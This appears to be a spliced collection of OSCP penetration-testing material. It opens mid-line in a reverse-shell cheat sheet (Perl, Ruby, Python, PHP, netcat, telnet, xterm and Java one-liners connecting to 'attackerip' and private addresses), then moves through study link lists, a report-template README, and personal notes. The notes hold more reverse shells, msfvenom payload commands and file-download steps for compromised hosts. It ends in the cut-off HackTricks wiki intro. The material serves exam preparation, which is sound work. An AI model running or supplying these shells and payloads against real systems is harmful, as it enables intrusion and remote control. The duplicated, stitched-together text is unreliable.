IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’ perl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’ perl -e ‘use Socket;$i=”10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’ perl -e ‘use Socket;$i=”10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’ ## RUBY: Longer Ruby reverse shell that does not depend on /bin/sh: ruby -rsocket -e ‘exit if fork;c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’ ruby -rsocket -e ‘exit if fork;c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’ If the target system is running Windows use the following one-liner: ruby -rsocket -e ‘c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’ ruby -rsocket -e ‘c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’ ruby -rsocket -e’f=TCPSocket.open(“attackerip”,1234).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’ ruby -rsocket -e’f=TCPSocket.open(“attackerip”,1234).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’ ## PYTHON: python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1″,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’ python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1″,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’ ## PHP: This code assumes that the TCP connection uses file descriptor 3. php -r ‘$sock=fsockopen(“10.0.0.1″,1234);exec(“/bin/sh -i <&3 >&3 2>&3″);’ php -r ‘$sock=fsockopen(“10.0.0.1″,1234);exec(“/bin/sh -i <&3 >&3 2>&3″);’ If you would like a PHP reverse shell to download, try this link on pentestmonkey.net -> LINK ## NETCAT: Other possible Netcat reverse shells, depending on the Netcat version and compilation flags: nc -e /bin/sh attackerip 4444 nc -e /bin/sh 192.168.37.10 443 If the -e option is disabled, try this mknod backpipe p && nc 192.168.23.10 443 0<backpipe | /bin/bash 1>backpipe mknod backpipe p && nc attackerip 8080 0<backpipe | /bin/bash 1>backpipe /bin/sh | nc attackerip 4444 /bin/sh | nc 192.168.23.10 443 rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/ rm -f /tmp/p; mknod /tmp/p p && nc 192.168.23.10 444 0/tmp/ If you have the wrong version of netcat installed, try rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.23.10 >/tmp/f rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f ## TELNET: If netcat is not available or /dev/tcp mknod backpipe p && telnet attackerip 8080 0<backpipe | /bin/bash 1>backpipe mknod backpipe p && telnet attackerip 8080 0<backpipe | /bin/bash 1>backpipe ## XTERM: Xterm is the best.. To catch incoming xterm, start an open X Server on your system (:1 – which listens on TCP port 6001). One way to do this is with Xnest: It is available on Ubuntu. Xnest :1 # Note: The command starts with uppercase X Xnest :1 # Note: The command starts with uppercase X Then remember to authorise on your system the target IP to connect to you: xterm -display 127.0.0.1:1 # Run this OUTSIDE the Xnest, another tab xhost +targetip # Run this INSIDE the spawned xterm on the open X Server xterm -display 127.0.0.1:1 # Run this OUTSIDE the Xnest, another tab xhost +targetip # Run this INSIDE the spawned xterm on the open X Server If you want anyone to connect to this spawned xterm try: xhost + # Run this INSIDE the spawned xterm on the open X Server xhost + # Run this INSIDE the spawned xterm on the open X Server Then on the target, assuming that xterm is installed, connect back to the open X Server on your system: xterm -display attackerip:1 xterm -display attackerip:1 Or: $ DISPLAY=attackerip:0 xterm $ DISPLAY=attackerip:0 xterm It will try to connect back to you, attackerip, on TCP port 6001. Note that on Solaris xterm path is usually not within the PATH environment variable, you need to specify its filepath: /usr/openwin/bin/xterm -display attackerip:1 /usr/openwin/bin/xterm -display attackerip:1 ## PHP: php -r ‘$sock=fsockopen(“192.168.0.100″,4444);exec(“/bin/sh -i <&3 >&3 2>&3″);’ ## JAVA: r = Runtime.getRuntime() p = r.exec([“/bin/bash”,”-c”,”exec 5<>/dev/tcp/192.168.0.100/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done”] as String[]) p.waitFor() ----- # OSCP-PWK-Prep-Resources- A list of the resources I have been using as I prepare for the exam Update: changed wording so that it didnt seem like I already have the certification. My exam is scheduled for the end of December. I also have some more resources that I have found helpful since the last update. I will be adding those sometime this week # OSCP Experience This are the blogs I have found that have given me a good direction to start as I prepared for the course https://www.hacksplaining.com/ http://www.abatchy.com/search/label/OSCP%20Prep http://www.techexams.net/forums/security-certifications/113355-list-recent-oscp-threads.html http://www.jasonbernier.com/oscp-review/ https://localhost.exposed/path-to-oscp/ https://pinboard.in/u:unfo/t:oscp # The Basics - Start Here these are the resources I used to get more comfortable with linux, scripting, TCP/IP, etc. I recommend starting with these especially if you dont have much/any experience https://pentesterlab.com/bootcamp http://www.penguintutor.com/linux/basic-network-reference https://www.cybrary.it/course/advanced-penetration-testing/ https://tulpasecurity.files.wordpress.com/2016/09/tulpa-pwk-prep-guide1.pdf # Metasploit although it has been said that Metasploit use is limited during the exam, Offensive Security recommends getting more familiar with Metasploit. I have been going through the metasploit unleashed course its really good info, i would be suprised if I dont have to come back to this repeatedly https://www.offensive-security.com/metasploit-unleashed/ https://community.rapid7.com/community/metasploit/blog/2016/11/15/test-your-might-with-the-shiny-new-metasploitable3 # Linux Exploitation https://sploitfun.wordpress.com/2015/06/26/linux-x86-exploit-development-tutorial-series/ Privilege Escalation - Linux https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ # TCPDump https://danielmiessler.com/study/tcpdump/ # Buffer Overflows https://www.sans.org/reading-room/whitepapers/threats/buffer-overflows-dummies-481 https://www.exploit-db.com/docs/28475.pdf # Enumeration https://hackercool.com/2016/07/smb-enumeration-with-kali-linux-enum4linuxacccheck-smbmap/ https://null-byte.wonderhowto.com/how-to/hack-like-pro-reconnaissance-with-recon-ng-part-1-getting-started-0169854/ http://0daysecurity.com/penetration-testing/enumeration.html # Cheat Sheets for All the Things!!!!!!! https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf https://highon.coffee/blog/nmap-cheat-sheet/ http://www.cheat-sheets.org/saved-copy/Notepad++_Cheat_Sheet.pdf http://www.isical.ac.in/~pdslab/2016/lectures/bash_cheat_sheet.pdf http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet https://www.sans.org/security-resources/GoogleCheatSheet.pdf https://www.tunnelsup.com/python-cheat-sheet/ https://www.tunnelsup.com/metasploit-cheat-sheet/ # Reverse and Bind Shell tutorials http://resources.infosecinstitute.com/icmp-reverse-shell/#gref # Text Editor Cheat Sheets https://vim.rtorr.com/ - Vim #OSCP Report Template # OSCP Report Templates This repo contains my templates for the OSCP Lab and OSCP Exam Reports. The reports are nearly identical, with minor variations between them. I wanted to share these templates with the community to help alleviate some of the stress people feel when they start their report. **Notable Edits - Lab Report** 1. Updated version to 3.2 2. Updated the Table of Contents to reflect the new data flow of the document 3. Added more information to the High Level Summary 4. Added a total of 10 machine sections. (Copy and paste these if you are reporting more than the 10 machines required for the lab report) 5. Updated 3.1 Information Gathering (For each machine, I create a link to the associated machine) 6. Updated the documentation flow. Each Machine is given its own section. Creates a boot to root walkthrough feel for each machine 7. Added the Service Enumeration table to each machine section instead of one table for the entire report 8. Added a header for Nmap scan results (screenshot) 9. Added a header for Initial Shell Screenshot 10. Added headers for Proof.txt Contents and the Proof.txt Screenshot 11. Added Appendix 1 - Proof Contents. This is an easy way to track those keys 12. Added Appendix 2 - PWK Course Exercises 13. Included all the headers for the requested exercises. The exercises are not included, as they are present in the course material **Notable Edits - Exam Report** 1. Updated version to 3.2 2. Updated the Table of Contents to reflect the new data flow of the document 3. Added more information to the High Level Summary 4. Updated 3.1 Information Gathering (For each machine, I create a link to the associated machine) 5. Updated the documentation flow. Each Machine is given its own section. Creates a boot to root walkthrough feel for each machine 6. Added the Service Enumeration table to each machine section instead of one table for the entire report 7. Added a header for Nmap scan results (screenshot) 8. Added headers for Local.txt Contents (the hash) and Local.txt Screenshot 9. Added headers for Proof.txt Contents and the Proof.txt Screenshot 10. Created a machine entry for the Buffer Overflow machine. 11. Added Appendix 1 - Proof and Local Contents. This is an easy way to track those keys 12. Added Appendix 2 - Metasploit/Meterpreter Usage. If you use the allowance on the exam, this is an easy way to document it 13. Added Appendix 3 - Completed Buffer Overflow Code **Notice** Original template was created by Offensive Security and can be found here: https://www.offensive-security.com/pwk-online/PWKv1-REPORT.doc OSCP Exam Report Template Download https://github.com/whoisflynn/OSCP-Exam-Report-Template/blob/master/OSCP-OS-XXXXX-Exam-Report_Template3.2.docx?raw=true OSCP Lab Report Template Download https://github.com/whoisflynn/OSCP-Exam-Report-Template/blob/master/OSCP-OS-XXXXX-Lab-Report_Template3.2.docx?raw=true ----- # USEFUL LINKS Resource for developing infosec skills for upcoming OSCP exam ## OSCP Rules & Documents [Exam Guide](https://support.offensive-security.com/#!oscp-exam-guide.md) ## Practice [Exploit Exercises](https://exploit-exercises.com/) [OverTheWire - Wargames](https://overthewire.org/wargames/) [Hack This Site](https://www.hackthissite.org/) [Flare-On](http://www.flare-on.com/) [Reverse Engineering Challenges](https://challenges.re/) [CTF Learn](https://ctflearn.com/) [Mystery Twister - Crypto Challenges](https://www.mysterytwisterc3.org/en/) ## Buffer Overflows [Buffer Overflow Practice](https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/) [Simple Windows BOF](http://proactivedefender.blogspot.com/2013/05/understanding-buffer-overflows.html?m=1) [Fuzzy Security - Windows Exploit Development](http://www.fuzzysecurity.com/tutorials.html) [dostackbufferoverflowgood - easy to read](https://github.com/justinsteven/dostackbufferoverflowgood) [Exploit Exercises](https://exploit-exercises.com/) [Corelan's exploit writing tutorial](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/) [Live Overflow's Binary Hacking Videos](https://www.youtube.com/watch?v=iyAyN3GFM7A&list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN) [Introduction to 32-bit Windows Buffer Overflows](https://www.veteransec.com/blog/introduction-to-32-bit-windows-buffer-overflows) [Getting Started with x86 Linux Buffer Overflows](https://scriptdotsh.com/index.php/2018/05/14/getting-started-with-linux-buffer-overflows-part-1-introduction/) ## Binary Exploitation [Binary Exploitation ELI5](https://medium.com/@danielabloom/binary-exploitation-eli5-part-1-9bc23855a3d8) [Exploit Development Roadmap](https://www.reddit.com/r/ExploitDev/comments/7zdrzc/exploit_development_learning_roadmap/) ## General OSCP Guides/Resources [Real Useful OSCP Journey](https://infosecuritygeek.com/my-oscp-journey/) [Tulpa PWK Prep](https://tulpa-security.com/2016/09/19/prep-guide-for-offsecs-pwk/) [Tulpa PWK Prep PDF](https://tulpasecurity.files.wordpress.com/2016/09/tulpa-pwk-prep-guide1.pdf) [Abatchy's Guide (apparently pretty good!)](https://www.abatchy.com/2017/03/how-to-prepare-for-pwkoscp-noob.html) [Real good guide with many an info](https://www.securitysift.com/offsec-pwb-oscp/) ## Infosec News / Publications [Security Affairs](http://securityaffairs.co/wordpress/) [The Register](https://www.theregister.co.uk/security/) [Risky Biz](https://risky.biz/) [Vectra](https://blog.vectra.ai/blog) ## Infosec Blogs [Nii Consulting](https://niiconsulting.com/checkmate/) [Guido Vranken](https://guidovranken.com) [SecJuice](https://medium.com/secjuice/) ## OSCP Reviews/Writeups ~~[Process Focused Review](https://occultsec.com/2018/04/27/the-oscp-a-process-focused-review/)~~ ~~[Full marks in 90 days](https://coffeegist.com/security/my-oscp-experience/)~~ [Zero to OSCP in 292 days (still somewhat relevant)](https://blog.mallardlabs.com/zero-to-oscp-in-292-days-or-how-i-accidentally-the-whole-thing-part-2/) [31-Day OSCP - with some useful info](https://scriptdotsh.com/index.php/2018/04/17/31-days-of-oscp-experience/) ## Fuzzing [Fuzzing Adobe Reader](https://kciredor.com/fuzzing-adobe-reader-for-exploitable-vulns-fun-not-profit.html) ## Reverse Engineering [Reverse Engineering x64 for Beginners](http://niiconsulting.com/checkmate/2018/04/reverse-engineering-x64-for-beginners-linux/) [Backdoor - Reverse Engineering CTFs](https://backdoor.sdslabs.co/) [Begin Reverse Engineering: workshop](https://www.begin.re/) ## Pivoting [The Red Teamer's Guide to Pivoting](https://artkond.com/2017/03/23/pivoting-guide/) ## Github Disovered OSCP Tools/Resources [Lots of OSCP Materials](https://gist.github.com/natesubra/5117959c660296e12d3ac5df491da395) [Collection of things made during OSCP journey](https://github.com/ihack4falafel/OSCP) [Notes from Study Plan](https://github.com/ferreirasc/oscp) [Resource List - not overly thorough](https://github.com/secman-pl/oscp) [Personal Notes for OSCP & Course](https://github.com/generaldespair/OSCP) [Buffer Overflow Practice](https://github.com/mikaelkall/vuln) [OSCP Cheat Sheet](https://github.com/mikaelkall/OSCP-cheat-sheet) [Bunch of interesting 1-liners and notes](https://github.com/gajos112/OSCP) [How to teach yourself infosec](https://github.com/thngkaiyuan/how-to-self-learn-infosec) ## Non-Preinstalled Kali Tools [Doubletap - loud/fast scanner](https://github.com/benrau87/doubletap) [Reconnoitre - recon for OSCP](https://github.com/codingo/Reconnoitre) [Pandora's Box - bunch of tools](https://github.com/paranoidninja/Pandoras-Box) [SleuthQL - SQLi Discovery Tool](https://github.com/RhinoSecurityLabs/SleuthQL) [Commix - Command Injection Exploiter](https://github.com/commixproject/commix) ## Source Code Review / Analysis [Static Analysis Tools](https://github.com/mre/awesome-static-analysis) ## Malware Analysis [Malware Analysis for Hedgehogs (YouTube)](https://www.youtube.com/channel/UCVFXrUwuWxNlm6UNZtBLJ-A) ## Misc [Windows Kernel Exploitation](https://rootkits.xyz/blog/2017/06/kernel-setting-up/) [Bunch of interesting tools/commands](https://github.com/adon90/pentest_compilation) [Forensics Field Guide](https://trailofbits.github.io/ctf/forensics/) [Bug Bounty Hunter's Methodology](https://github.com/jhaddix/tbhm) [**Fantastic** lecture resource for learning assembly](https://www.youtube.com/watch?v=H4Z0S9ZbC0g) [Awesome WAF bypass/command execution filter bypass](https://medium.com/secjuice/waf-evasion-techniques-718026d693d8) ----- ## General Links - Exploit interpreter fix: https://askubuntu.com/questions/304999/not-able-to-execute-a-sh-file-bin-bashm-bad-interpreter - Oscp repo: https://github.com/rewardone/OSCPRepo - Pentest compilation: https://github.com/adon90/pentest_compilation - Command Templates: https://pentest.ws - Password Lists: https://github.com/danielmiessler/SecLists - Automated OSCP reconnaissance tool: https://github.com/codingo/Reconnoitre - OSCP Report Template: https://github.com/whoisflynn/OSCP-Exam-Report-Template - OSCP Scripts: https://github.com/ihack4falafel/OSCP - Pentesting resource: https://guif.re/ - FTP Binary mode: https://www.jscape.com/blog/ftp-binary-and-ascii-transfer-types-and-the-case-of-corrupt-files - Pentesting Cheatsheet: https://ired.team/ ## Enumeration - General Enumeration - Common port checks: http://www.0daysecurity.com/penetration-testing/enumeration.html - Nmap Scripts: https://nmap.org/nsedoc/ ## Web - LFI/RFI: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#basic-rfi - MSSQL Injection: https://www.exploit-db.com/papers/12975 - MSSQL Union Based Injection: http://www.securityidiots.com/Web-Pentest/SQL-Injection/MSSQL/MSSQL-Union-Based-Injection.html - MSSQL SQL Injection Cheat Sheet: http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet - MySQL Injection: http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet - MongoDB Nosql Injection: https://security.stackexchange.com/questions/83231/mongodb-nosql-injection-in-python-code - http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet - https://guif.re/webtesting ## Shell Exploitation - Reverse Shell Cheat Sheet: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet - More Reverse Shells: https://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/ - Even More Reverse shells: https://delta.navisec.io/reverse-shell-reference/ - Spawning TTY Shell: https://netsec.ws/?p=337 - Metasploit payloads (msfvenom): https://netsec.ws/?p=331 - Best Web Shells: https://www.1337pwn.com/best-php-web-shells/ - https://github.com/artyuum/Simple-PHP-Web-Shell - http://www.topshellv.com/ - Escape from SHELLcatraz: https://speakerdeck.com/knaps/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells?slide=10 ### Reverse Shells - bash -i >& /dev/tcp/10.10.10.10/4443 0>&1 - rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 4443 >/tmp/f - nc -e /bin/sh 10.10.10.10 4443 - nc -e cmd.exe 10.10.10.10 4443 - python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' - perl -e 'use Socket;$i="10.10.10.10";$p=4443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' ### Spawn TTY Shells - python -c 'import pty; pty.spawn("/bin/sh")' - echo os.system('/bin/bash') - /bin/sh -i - perl —e 'exec "/bin/sh";' - perl: exec "/bin/sh"; - ruby: exec "/bin/sh" - lua: os.execute('/bin/sh') - (From within IRB): exec "/bin/sh" - (From within vi): :!bash - (From within vi): :set shell=/bin/bash:shell - (From within nmap): !sh ### msfvenom payloads - PHP reverse shell: msfvenom -p php/reverse_php LHOST=10.10.10.10 LPORT=4443 -f raw -o shell.php - Java WAR reverse shell: msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f war -o shell.war - Linux bind shell: msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai - Linux FreeBSD reverse shell: msfvenom -p bsd/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f elf -o shell.elf - Linux C reverse shell: msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f c - Windows non staged reverse shell: msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o non_staged.exe - Windows Staged (Meterpreter) reverse shell: msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o meterpreter.exe - Windows Python reverse shell: msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f python -o shell.py - Windows ASP reverse shell: msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f asp -e x86/shikata_ga_nai -o shell.asp - Windows ASPX reverse shell: msfvenom -f aspx -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -o shell.aspx - Windows JavaScript reverse shell with nops: msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f js_le -e generic/none -n 18 - Windows Powershell reverse shell: msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1 - Windows reverse shell excluding bad characters: msfvenom -p windows/shell_reverse_tcp -a x86 LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f c -b "\x00\x04" -e x86/shikata_ga_nai - Windows x64 bit reverse shell: msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -o shell.exe - Windows reverse shell embedded into plink: msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe ## File Transfers ``` HTTP # In Kali python -m SimpleHTTPServer 80 # In reverse shell - Linux wget 10.10.10.10/file # In reverse shell - Windows powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.10.10/file.exe','C:\Users\user\Desktop\file.exe')" ``` ``` FTP # In Kali python -m pyftpdlib -p 21 -w # In reverse shell echo open 10.10.10.10 > ftp.txt echo USER anonymous >> ftp.txt echo ftp >> ftp.txt echo bin >> ftp.txt echo GET file >> ftp.txt echo bye >> ftp.txt # Execute ftp -v -n -s:ftp.txt “Name the filename as ‘file’ on your kali machine so that you don’t have to re-write the script multiple names, you can then rename the file on windows.” ``` ``` TFTP # In Kali atftpd --daemon --port 69 /tftp # In reverse shell tftp -i 10.10.10.10 GET nc.exe ``` ``` VBS If FTP/TFTP fails you, this wget script in VBS is the go to on Windows machines. # In reverse shell echo strUrl = WScript.Arguments.Item(0) > wget.vbs echo StrFile = WScript.Arguments.Item(1) >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs echo Err.Clear >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs echo http.Open "GET",strURL,False >> wget.vbs echo http.Send >> wget.vbs echo varByteArray = http.ResponseBody >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs echo strData = "" >> wget.vbs echo strBuffer = "" >> wget.vbs echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs echo Next >> wget.vbs echo ts.Close >> wget.vbs # Execute cscript wget.vbs http://10.10.10.10/file.exe file.exe ``` ## Privilege Escalation Common priviledge escalation exploits and scripts: https://github.com/AusJock/Privilege-Escalation ### Linux - Linux EoP (Best privesc): https://guif.re/linuxeop - Basic Linux Privilege Escalation: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ - unix-privesc-check: http://pentestmonkey.net/tools/audit/unix-privesc-check - linuxprivchecker.py: http://www.securitysift.com/download/linuxprivchecker.py - Linux Enumeration: https://github.com/rebootuser/LinEnum - pspy: https://github.com/DominicBreuker/pspy - Linux Priv Checker: https://github.com/sleventyeleven/linuxprivchecker - Kernel Exploits: https://github.com/lucyoa/kernel-exploits - PrivEsc binaries: https://gtfobins.github.io/ ### Windows - Windows Privilege Escalation Fundamentals: http://www.fuzzysecurity.com/tutorials/16.html - Windows-Exploit-Suggester: https://github.com/GDSSecurity/Windows-Exploit-Suggester - winprivesc: https://github.com/joshruppe/winprivesc - Windows Privilege Escalation Guide: https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ - Windows-Privesc: https://github.com/togie6/Windows-Privesc - WindowsExploits: https://github.com/abatchy17/WindowsExploits - PowerSploit: https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc - Windows EoP: https://guif.re/windowseop - OSCP Notes: https://securism.wordpress.com/oscp-notes-privilege-escalation-windows/ - PrivEsc Binaries: https://lolbas-project.github.io/ ## Offensive Security Links - OSCP Certification Exam Guide: https://support.offensive-security.com/oscp-exam-guide/ - Proctored Exam Guide: https://www.offensive-security.com/faq/#proc-1 - https://support.offensive-security.com/proctoring-faq/ - OSCP Exam FAQ: https://forums.offensive-security.com/showthread.php?2191-FAQ-Questions-about-the-OSCP-Exam - Common Technical Issues: https://forums.offensive-security.com/showthread.php?2190-Common-Technical-Issues - General Questions: https://forums.offensive-security.com/showthread.php?2189-General-questions-about-the-PWK-course - Network Introduction Guide: https://support.offensive-security.com/pwk-network-intro-guide/ ## Books - [RTFM - Red Team Field Manual](https://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504/ref=sr_1_1?keywords=RTFM+-+Red+Team+Field+Manual&qid=1573218400&sr=8-1) - [Penetration Testing - A Hands-On Introduction to Hacking](https://www.amazon.com/Penetration-Testing-Hands-Introduction-Hacking/dp/1593275641/ref=sr_1_1?keywords=Penetration+Testing+-+A+Hands-On+Introduction+to+Hacking&qid=1573218418&sr=8-1) - [Metasploit The Penetration Tester’s Guide](https://www.amazon.com/Metasploit-Penetration-Testers-David-Kennedy/dp/159327288X/ref=sr_1_1?keywords=Metasploit+The+Penetration+Tester%E2%80%99s+Guide&qid=1573218431&sr=8-1) - [Web Application Hacker's Handbook](https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470/ref=sr_1_1?keywords=Web+Application+Hacker%27s+Handbook&qid=1573218445&sr=8-1) - PWK Booklet and Videos
# HackTricks <figure><img src=".gitbook/assets/hacktricks.gif" alt=""><figcaption></figcaption></figure> _Hacktricks logos & motion design by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._ {% hint style="success" %} **Welcome to the wiki where you will find each hacking trick/technique/whatever I have learnt from CTFs, real life apps, reading researches, and news.** {% endhint %} To get started follow this page where you will find the **typical flow** that **you should follow when pentesting** one or more **machines:** {% content-ref url="generic-methodologies-and-resources/pentesting-methodology.md" %} [pentesting-methodology.md](generic-methodologies-and-resources/pentesting-methodology.md) {% endcontent-ref %} ## Platinum Sponsors _Your company could be here_ ## Corporate Sponsors ### [STM Cyber](https://www.stmcyber.com) ![](<.gitbook/assets/image (642) (1) (1) (1).png>) [**STM Cyber**](https://www.stmcyber.com) is a great cybersecurity company whose slogan is **HACK THE UNHACKABLE**. They perform their own research and develop their own hacking tools to **offer several valuable cybersecurity services** like pentesting, Red teams and training. You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stmcyber.com) **STM Cyber** also support cybersecurity open source projects like HackTricks :) ### [RootedCON](https://www.rootedcon.com/) <figure><img src=".gitbook/assets/image (1) (3) (3).png" alt=""><figcaption></figcaption></figure> [**RootedCON**](https://www.rootedcon.com) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. {% embed url="https://www.rootedcon.com/" %} ### [Intigriti](https://www.intigriti.com) ![](.gitbook/assets/i3.png) **Intigriti** is the **Europe's #1** ethical hacking and **bug bounty platform.** **Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} ### [Trickest](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) <figure><img src=".gitbook/assets/image (9) (1) (2).png" alt=""><figcaption></figcaption></figure> \ Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools. Get Access Today: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} ### [HACKENPROOF](https://bit.ly/3xrrDrL) <figure><img src=".gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure> **HackenProof is home to all crypto bug bounties.** **Get rewarded without delays**\ HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified. **Get experience in web3 pentesting**\ Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days. **Become the web3 hacker legend**\ Gain reputation points with each verified bug and conquer the top of the weekly leaderboard. [**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks! {% embed url="https://hackenproof.com/register" %} \--- ### [WebSec](https://websec.nl/) <figure><img src=".gitbook/assets/logo.svg" alt=""><figcaption></figcaption></figure> [**WebSec**](https://websec.nl) is a professional cybersecurity company based in **Amsterdam** which helps **protecting** businesses **all over the world** against the latest cybersecurity threats by providing **offensive-security services** with a **modern** approach. WebSec is an **all-in-one security company** which means they do it all; Pentesting, **Security** Audits, Awareness Trainings, Phishing Campagnes, Code Review, Exploit Development, Security Experts Outsourcing and much more. Another cool thing about WebSec is that unlike the industry average WebSec is **very confident in their skills**, to such an extent that they 